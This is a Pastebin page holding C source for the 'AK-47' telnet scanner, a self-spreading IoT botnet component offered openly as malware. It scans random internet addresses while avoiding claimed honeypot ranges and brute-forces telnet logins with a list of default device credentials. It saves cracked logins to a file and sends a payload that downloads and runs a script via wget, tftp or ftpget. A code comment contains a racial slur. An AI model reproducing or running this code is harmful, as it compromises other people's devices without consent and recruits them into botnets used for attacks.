Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <stdarg.h>
- #include <errno.h>
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <fcntl.h>
- #include <strings.h>
- #include <string.h>
- #include <unistd.h>
- #include <dirent.h>
- #include <poll.h>
- #include <netdb.h>
- #include <time.h>
- #include <net/if.h>
- #include <sys/wait.h>
- #include <sys/time.h>
- #include <sys/ioctl.h>
- #include <arpa/inet.h>
- #include <sys/socket.h>
- #include <netinet/ip.h>
- #include <netinet/in.h>
- #include <netinet/tcp.h>
- #include <netinet/udp.h>
- #include <resolv.h>
- //amp setting
- #define MAX_PACKET_SIZE 1024
- #define PHI 0x9e3779b9
- //telnet scanner stuff
- #define BUFFER_SIZE 1024
- #define CMD_IAC 255
- #define CMD_WILL 251
- #define CMD_WONT 252
- #define CMD_DO 253
- #define CMD_DONT 254
- #define PAD_RIGHT 1
- #define PAD_ZERO 2
- #define PRINT_BUF_LEN 12
- #define OPT_SGA 3
- #define SOCKBUF_SIZE 1024
- // Telnet scanner payload, must end with \r\n\0
- char *rekdevice = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://0.0.0.0/update.sh; busybox wget http://0.0.0.0/update.sh; tftp -r update.sh -g 0.0.0.0; busybox tftp -r update.sh -g 0.0.0.0; ftpget -v -u anonymous -p anonymous -P 21 0.0.0.0 update.sh update.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 0.0.0.0 update.sh update.sh; chmod 777 update.sh; busybox chmod 777 update.sh; sh update.sh; rm -rf update.sh\r\n\0";
- char *usernames[] = {
- "\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "guest\0",
- "guest\0",
- "guest\0",
- "guest\0",
- "guest\0",
- "guest\0",
- "guest\0",
- "root\0",
- "admin\0",
- "root\0",
- "default\0",
- "user\0",
- "guest\0",
- "daemon\0",
- "admin\0",
- "admin\0",
- "root\0",
- "admin\0",
- "adm\0",
- "guest\0",
- "root\0",
- "root\0",
- "telnet\0",
- "root\0",
- "admin\0",
- "admin\0",
- "Administrator\0",
- "root\0",
- "mg3500\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "default\0",
- "admin\0",
- "admin\0",
- "admin\0",
- "root\0",
- "root\0",
- "root\0",
- "root\0",
- "admin1\0",
- "ubnt\0",
- "support\0",
- "root\0",
- "user\0",
- "guest\0"
- };
- char *passwords[] = {
- "\0",
- "root\0",
- "password\0",
- "\0",
- "Zte521\0",
- "vizxv\0",
- "000000\0",
- "14567\0",
- "hi3518\0",
- "user\0",
- "pass\0",
- "admin14\0",
- "7ujMko0admin\0",
- "00000000\0",
- "<>\0",
- "klv1\0",
- "klv14\0",
- "oelinux1\0",
- "realtek\0",
- "1111\0",
- "54321\0",
- "antslq\0",
- "zte9x15\0",
- "system\0",
- "1456\0",
- "888888\0",
- "ikwb\0",
- "default\0",
- "juantech\0",
- "xc3511\0",
- "support\0",
- "1111111\0",
- "service\0",
- "145\0",
- "4321\0",
- "tech\0",
- "<>\0",
- "abc1\0",
- "7ujMko0admin\0",
- "switch\0",
- "admin14\0",
- "\0",
- "1111\0",
- "meinsm\0",
- "pass\0",
- "smcadmin\0",
- "14567890\0",
- "14\0",
- "admin1\0",
- "password\0",
- "admin\0",
- "anko\0",
- "xc3511\0",
- "1456\0",
- "\0",
- "guest\0",
- "145\0",
- "xc3511\0",
- "admin\0",
- "Zte521\0",
- "\0",
- "user\0",
- "guest\0",
- "\0",
- "password\0",
- "admin1\0",
- "ikwb\0",
- "14567890\0",
- "\0",
- "\0",
- "1456\0",
- "root\0",
- "telnet\0",
- "zte9x15\0",
- "meinsm\0",
- "\0",
- "\0",
- "antslq\0",
- "merlin\0",
- "switch\0",
- "7ujMko0admin\0",
- "abc1\0",
- "<>\0",
- "tech\0",
- "4321\0",
- "default\0",
- "145\0",
- "service\0",
- "1111111\0",
- "admin14\0",
- "pass\0",
- "user\0",
- "hi3518\0",
- "password\0",
- "ubnt\0",
- "zlxx.\0",
- "14567\0",
- "000000\0"
- };
- char *advances[] = {
- ":",
- "ser",
- "ogin",
- "name",
- "pass",
- "dvrdvs",
- (char *) 0
- };
- char *fails[] = {
- "nvalid",
- "ailed",
- "ncorrect",
- "enied",
- "error",
- "goodbye",
- "bad",
- "timeout",
- (char *) 0
- };
- char *successes[] = {
- "$",
- "#",
- ">",
- "@",
- "shell",
- "dvrdvs",
- "usybox",
- (char *) 0
- };
- char *advances2[] = {
- ":",
- "nvalid",
- "ailed",
- "ncorrect",
- "enied",
- "rror",
- "oodbye",
- "bad",
- "busybox",
- "$",
- "#",
- (char *) 0
- };
- char *legit[] = {
- "AK47",
- (char *) 0
- };
- char *infected[] = {
- "CAPSAICIN",
- (char *) 0
- };
- int scanPid = 0;
- struct telstate_t {
- int fd;
- unsigned int ip;
- unsigned char state;
- unsigned char complete;
- unsigned char usernameInd; /* username */
- unsigned char passwordInd; /* password */
- unsigned int totalTimeout; /* totalTimeout */
- char *sockbuf;
- };
- struct ipstate_t {
- int fd;
- unsigned int ip;
- unsigned char state;
- unsigned char complete;
- unsigned char usernameInd;
- unsigned char passwordInd;
- unsigned int totalTimeout;
- unsigned int telPort;
- char *sockbuf;
- };
- static uint32_t Q[4096], c = 362436;
- void init_rand(uint32_t x)
- {
- int i;
- Q[0] = x;
- Q[1] = x + PHI;
- Q[2] = x + PHI + PHI;
- for (i = 3; i < 4096; i++)
- Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
- }
- uint32_t rand_cmwc(void)
- {
- uint64_t t, a = 18782LL;
- static uint32_t i = 4095;
- uint32_t x, r = 0xfffffffe;
- i = (i + 1)&4095;
- t = a * Q[i] + c;
- c = (t >> 32);
- x = t + c;
- if(x < c) {
- x++;
- c++;
- }
- return (Q[i] = r - x);
- }
- static void printchar(unsigned char ** str, int c) {
- if (str) { **
- str = c;
- ++( * str);
- } else(void) write(1,&c, 1);
- }
- static int prints(unsigned char ** out,
- const unsigned char *string, int width, int pad) {
- register int pc = 0, padchar = ' ';
- if (width > 0) {
- register int len = 0;
- register
- const unsigned char *ptr;
- for (ptr = string;* ptr; ++ptr) ++len;
- if (len >= width) width = 0;
- else width -= len;
- if (pad&PAD_ZERO) padchar = '0';
- }
- if (!(pad&PAD_RIGHT)) {
- for (; width > 0; --width) {
- printchar(out, padchar);
- ++pc;
- }
- }
- for (;* string; ++string) {
- printchar(out, * string);
- ++pc;
- }
- for (; width > 0; --width) {
- printchar(out, padchar);
- ++pc;
- }
- return pc;
- }
- static int printi(unsigned char ** out, int i, int b, int sg, int width, int pad, int letbase) {
- unsigned char print_buf[PRINT_BUF_LEN];
- register unsigned char *s;
- register int t, neg = 0, pc = 0;
- register unsigned int u = i;
- if (i == 0) {
- print_buf[0] = '0';
- print_buf[1] = '\0';
- return prints(out, print_buf, width, pad);
- }
- if (sg && b == 10 && i < 0) {
- neg = 1;
- u = -i;
- }
- s = print_buf + PRINT_BUF_LEN - 1;
- * s = '\0';
- while (u) {
- t = u % b;
- if (t >= 10)
- t += letbase - '0' - 10;
- *--s = t + '0';
- u /= b;
- }
- if (neg) {
- if (width && (pad&PAD_ZERO)) {
- printchar(out, '-');
- ++pc;
- --width;
- } else {
- *--s = '-';
- }
- }
- return pc + prints(out, s, width, pad);
- }
- static int print(unsigned char ** out,
- const unsigned char *format, va_list args) {
- register int width, pad;
- register int pc = 0;
- unsigned char scr[2];
- for (;* format != 0; ++format) {
- if ( * format == '%') {
- ++format;
- width = pad = 0;
- if ( * format == '\0') break;
- if ( * format == '%') goto out;
- if ( * format == '-') {
- ++format;
- pad = PAD_RIGHT;
- }
- while ( * format == '0') {
- ++format;
- pad |= PAD_ZERO;
- }
- for (;* format >= '0' && * format <= '9'; ++format) {
- width *= 10;
- width += * format - '0';
- }
- if ( * format == 's') {
- register char *s = (char *) va_arg(args, int);
- pc += prints(out, s ? s : "(null)", width, pad);
- continue;
- }
- if ( * format == 'd') {
- pc += printi(out, va_arg(args, int), 10, 1, width, pad, 'a');
- continue;
- }
- if ( * format == 'x') {
- pc += printi(out, va_arg(args, int), 16, 0, width, pad, 'a');
- continue;
- }
- if ( * format == 'X') {
- pc += printi(out, va_arg(args, int), 16, 0, width, pad, 'A');
- continue;
- }
- if ( * format == 'u') {
- pc += printi(out, va_arg(args, int), 10, 0, width, pad, 'a');
- continue;
- }
- if ( * format == 'c') {
- scr[0] = (unsigned char) va_arg(args, int);
- scr[1] = '\0';
- pc += prints(out, scr, width, pad);
- continue;
- }
- } else {
- out: printchar(out, * format);
- ++pc;
- }
- }
- if (out) ** out = '\0';
- va_end(args);
- return pc;
- }
- int szprintf(unsigned char *out,
- const unsigned char *format, ...) {
- va_list args;
- va_start(args, format);
- return print(&out, format, args);
- }
- char *thanks = "thanks to unhappygh0st for the honeypot ip ranges :)";
- in_addr_t getDatIP() {
- uint8_t ipState[4] = {
- 0
- };
- ipState[0] = rand() % 255;
- ipState[1] = rand() % 255;
- ipState[2] = rand() % 255;
- ipState[3] = rand() % 255;
- while (
- (ipState[0] == 0) ||
- (ipState[0] == 10) ||
- (ipState[0] == 100 && (ipState[1] >= 64 && ipState[1] <= 127)) ||
- (ipState[0] == 127) ||
- (ipState[0] == 169 && ipState[1] == 254) ||
- (ipState[0] == 172 && (ipState[1] <= 16 && ipState[1] <= 31)) ||
- (ipState[0] == 192 && ipState[1] == 0 && ipState[2] == 2) ||
- (ipState[0] == 192 && ipState[1] == 88 && ipState[2] == 99) ||
- (ipState[0] == 192 && ipState[1] == 168) ||
- (ipState[0] == 198 && (ipState[1] == 18 || ipState[1] == 19)) ||
- (ipState[0] == 198 && ipState[1] == 51 && ipState[2] == 100) ||
- (ipState[0] == 203 && ipState[1] == 0 && ipState[2] == 113) ||
- (ipState[0] == 62 && ipState[1] <= 30) || //Honeypot
- (ipState[0] == 207 && ipState[1] >= 31 && ipState[2] <= 120) || //FBI Honeypots (207.31.0.0 - 207.120.255.255)
- (ipState[0] == 65) && (ipState[1] >= 224) && (ipState[2] <= 226) || // More FBI Honeypots (64.224.0.0 - 64.226.255.255)
- (ipState[0] == 195) && (ipState[1] == 10) || //Yet another FBI Honeypot.
- (ipState[0] == 216) && (ipState[1] == 25 || ipState[1] == 94) || //Fucking nigger LOL (FBI Honeypots)
- (ipState[0] == 212) && (ipState[1] == 56) || //The fuck?! 212.56.107.22 - uhhhhm. FBI Honeypot.
- (ipState[0] >= 224) && (ipState[0] <= 239) //Multicast ip ranges
- ) {
- ipState[0] = rand() % 255;
- ipState[1] = rand() % 255;
- ipState[2] = rand() % 255;
- ipState[3] = rand() % 255;
- }
- char ip[16] = {
- 0
- };
- szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
- return inet_addr(ip);
- }
- int negotiate(int sock, unsigned char *buf, int len) {
- unsigned char c;
- switch (buf[1]) {
- case CMD_IAC:
- return 0;
- case CMD_WILL:
- case CMD_WONT:
- case CMD_DO:
- case CMD_DONT:
- c = CMD_IAC;
- send(sock,&c, 1, MSG_NOSIGNAL);
- if (CMD_WONT == buf[1]) c = CMD_DONT;
- else if (CMD_DONT == buf[1]) c = CMD_WONT;
- else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
- else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
- send(sock,&c, 1, MSG_NOSIGNAL);
- send(sock,&(buf[2]), 1, MSG_NOSIGNAL);
- break;
- default:
- break;
- }
- return 0;
- }
- int contains_string(char *buffer, char ** strings) {
- int num_strings = 0, i = 0;
- for (num_strings = 0; strings[++num_strings] != 0;);
- for (i = 0; i < num_strings; i++) {
- if (strcasestr(buffer, strings[i])) {
- return 1;
- }
- }
- return 0;
- }
- int contains_success(char *buffer) {
- return contains_string(buffer, successes);
- }
- int contains_fail(char *buffer) {
- return contains_string(buffer, fails);
- }
- int contains_response(char *buffer) {
- return contains_success(buffer) || contains_fail(buffer);
- }
- int read_with_timeout(int fd, int timeout_usec, char *buffer, int buf_size) {
- fd_set read_set;
- struct timeval tv;
- tv.tv_sec = 0;
- tv.tv_usec = timeout_usec;
- FD_ZERO(&read_set);
- FD_SET(fd,&read_set);
- if (select(fd + 1,&read_set, NULL, NULL,&tv) < 1)
- return 0;
- return recv(fd, buffer, buf_size, 0);
- }
- int read_until_response(int fd, int timeout_usec, char *buffer, int buf_size, char ** strings) {
- int num_bytes, i;
- memset(buffer, 0, buf_size);
- num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);
- if (&buffer[0] == "\xFF") {
- negotiate(fd, buffer, 3);
- }
- if (contains_string(buffer, strings)) {
- return 1;
- }
- return 0;
- }
- const char *get_telstate_host(struct telstate_t * telstate) { // get host
- struct in_addr in_addr_ip;
- in_addr_ip.s_addr = telstate->ip;
- return inet_ntoa(in_addr_ip);
- }
- void advance_telstate(struct telstate_t * telstate, int new_state) { // advance
- if (new_state == 0) {
- close(telstate->fd);
- }
- telstate->totalTimeout = 0;
- telstate->state = new_state;
- memset((telstate->sockbuf), 0, SOCKBUF_SIZE);
- }
- void reset_telstate(struct telstate_t * telstate) { // reset
- advance_telstate(telstate, 0);
- telstate->complete = 1;
- }
- int sclose(int fd) {
- if (3 > fd) return 1;
- close(fd);
- return 0;
- }
- void ak47telscan(int wait_usec, int maxfds) {
- int i, res, num_tmps, j;
- char buf[128], cur_dir;
- int max = maxfds;
- fd_set fdset;
- struct timeval tv;
- socklen_t lon;
- int valopt;
- srand(time(NULL) ^ rand_cmwc());
- char line[256];
- char *buffer;
- struct sockaddr_in dest_addr;
- dest_addr.sin_family = AF_INET;
- dest_addr.sin_port = htons(23);
- memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
- buffer = malloc(BUFFER_SIZE + 1);
- memset(buffer, 0, BUFFER_SIZE + 1);
- struct telstate_t fds[max];
- memset(fds, 0, max * (sizeof(int) + 1));
- for (i = 0; i < max; i++) {
- memset(&(fds[i]), 0, sizeof(struct telstate_t));
- fds[i].complete = 1;
- fds[i].sockbuf = buffer;
- }
- while (1) {
- for (i = 0; i < max; i++) {
- if (fds[i].totalTimeout == 0) {
- fds[i].totalTimeout = time(NULL);
- }
- switch (fds[i].state) {
- case 0:
- {
- if (fds[i].complete == 1) {
- // clear the current fd
- char *tmp = fds[i].sockbuf;
- memset(&(fds[i]), 0, sizeof(struct telstate_t));
- fds[i].sockbuf = tmp;
- // get a new random ip
- fds[i].ip = getDatIP();
- } else if (fds[i].complete == 0) {
- fds[i].passwordInd++;
- fds[i].usernameInd++;
- if (fds[i].passwordInd == sizeof(passwords) / sizeof(char *)) {
- fds[i].complete = 1;
- continue;
- }
- if (fds[i].usernameInd == sizeof(usernames) / sizeof(char *)) {
- fds[i].complete = 1;
- continue;
- }
- }
- dest_addr.sin_family = AF_INET;
- dest_addr.sin_port = htons(23);
- memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
- dest_addr.sin_addr.s_addr = fds[i].ip;
- fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
- if (fds[i].fd == -1) continue;
- fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
- if (connect(fds[i].fd, (struct sockaddr * )&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) {
- reset_telstate(&fds[i]);
- } else {
- advance_telstate(&fds[i], 1);
- }
- }
- break;
- case 1:
- {
- printf("[AK-47] FOUND ---> %s:23\n", get_telstate_host(&fds[i]));
- FD_ZERO(&fdset);
- FD_SET(fds[i].fd,&fdset);
- tv.tv_sec = 0;
- tv.tv_usec = wait_usec;
- res = select(fds[i].fd + 1, NULL,&fdset, NULL,&tv);
- if (res == 1) {
- lon = sizeof(int);
- valopt = 0;
- getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void * )(&valopt),&lon);
- //printf("%d\n",valopt);
- if (valopt) {
- reset_telstate(&fds[i]);
- } else {
- fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL)&(~O_NONBLOCK));
- advance_telstate(&fds[i], 2);
- }
- continue;
- } else if (res == -1) {
- reset_telstate(&fds[i]);
- continue;
- }
- if (fds[i].totalTimeout + 5 < time(NULL)) {
- reset_telstate(&fds[i]);
- }
- }
- break;
- case 2:
- {
- if (read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances)) {
- if (contains_fail(fds[i].sockbuf)) {
- advance_telstate(&fds[i], 0);
- } else {
- advance_telstate(&fds[i], 3);
- }
- continue;
- }
- if (fds[i].totalTimeout + 7 < time(NULL)) {
- reset_telstate(&fds[i]);
- }
- }
- break;
- case 3:
- {
- if (send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) {
- reset_telstate(&fds[i]);
- continue;
- }
- if (send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
- reset_telstate(&fds[i]);
- continue;
- }
- advance_telstate(&fds[i], 4);
- }
- break;
- case 4:
- {
- if (read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances)) {
- if (contains_fail(fds[i].sockbuf)) {
- advance_telstate(&fds[i], 0);
- } else {
- advance_telstate(&fds[i], 5);
- }
- continue;
- }
- if (fds[i].totalTimeout + 3 < time(NULL)) {
- reset_telstate(&fds[i]);
- }
- }
- break;
- case 5:
- {
- if (send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) {
- reset_telstate(&fds[i]);
- continue;
- }
- if (send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
- reset_telstate(&fds[i]);
- continue;
- }
- advance_telstate(&fds[i], 6);
- }
- break;
- case 6:
- {
- if (read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances2)) {
- fds[i].totalTimeout = time(NULL);
- if (contains_fail(fds[i].sockbuf)) {
- advance_telstate(&fds[i], 0);
- } else if (contains_success(fds[i].sockbuf)) {
- if (fds[i].complete == 2) {
- advance_telstate(&fds[i], 7);
- } else {
- printf("[AK-47] [-] CRACKED ---> %s:23 %s:%s\n", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
- char command[1024];
- sprintf(command, "echo '%s:23 %s:%s' >> cracked.txt", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
- system(command);
- advance_telstate(&fds[i], 7);
- }
- } else {
- reset_telstate(&fds[i]);
- }
- continue;
- }
- if (fds[i].totalTimeout + 7 < time(NULL)) {
- reset_telstate(&fds[i]);
- }
- }
- break;
- case 7:
- {
- fds[i].totalTimeout = time(NULL);
- if (send(fds[i].fd, "enable\r\n", 8, MSG_NOSIGNAL) < 0) {
- sclose(fds[i].fd);
- fds[i].state = 0;
- fds[i].complete = 1;
- continue;
- }
- if (send(fds[i].fd, "system\r\n", 8, MSG_NOSIGNAL) < 0) {
- sclose(fds[i].fd);
- fds[i].state = 0;
- fds[i].complete = 1;
- continue;
- }
- if (send(fds[i].fd, "shell\r\n", 7, MSG_NOSIGNAL) < 0) {
- sclose(fds[i].fd);
- fds[i].state = 0;
- fds[i].complete = 1;
- continue;
- }
- if (send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) < 0) {
- sclose(fds[i].fd);
- fds[i].state = 0;
- fds[i].complete = 1;
- continue;
- }
- if(send(fds[i].fd, "echo -e '\\x41\\x4b\\x34\\x37'", 26, MSG_NOSIGNAL) < 0) {
- sclose(fds[i].fd);
- fds[i].state = 0;
- fds[i].complete = 1;
- continue;
- }
- if (read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, legit)) {
- if (send(fds[i].fd, rekdevice, strlen(rekdevice), MSG_NOSIGNAL) > 0) {
- printf("[AK-47] [-] PAYLOAD SENT ---> %s:23 %s:%s\n", inet_ntoa( * (struct in_addr * )&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
- reset_telstate(&fds[i]);
- }
- sleep(20);
- if (read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, SOCKBUF_SIZE, infected)) {
- printf("[AK-47] [+] SUCCESSFUL INFECTION ---> %s:23 %s:%s\n", inet_ntoa( * (struct in_addr * )&(fds[i].ip)), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
- reset_telstate(&fds[i]);
- continue;
- }
- if (fds[i].totalTimeout + 60 < time(NULL)) {
- if (fds[i].complete != 3) {
- printf("[AK-47] [-] FAILED TO INFECT ---> %s:23 %s:%s\n", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
- }
- reset_telstate(&fds[i]);
- }
- }
- break;
- }
- }
- }
- }
- }
- int main(int argc, char **argv) {
- uint32_t parent;
- parent = fork();
- int forks = sysconf(_SC_NPROCESSORS_ONLN);
- int fds = forks * 512; //Far effective. 512 sockets for each CPU.
- if (parent > 0) {
- scanPid = parent;
- return 0;
- } else if (parent == -1) return 1;
- int ii;
- for (ii = 0; ii < forks; ii++) {
- srand((time(NULL) ^ getpid()) + getppid());
- init_rand(time(NULL) ^ getpid());
- ak47telscan(370, fds);
- }
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement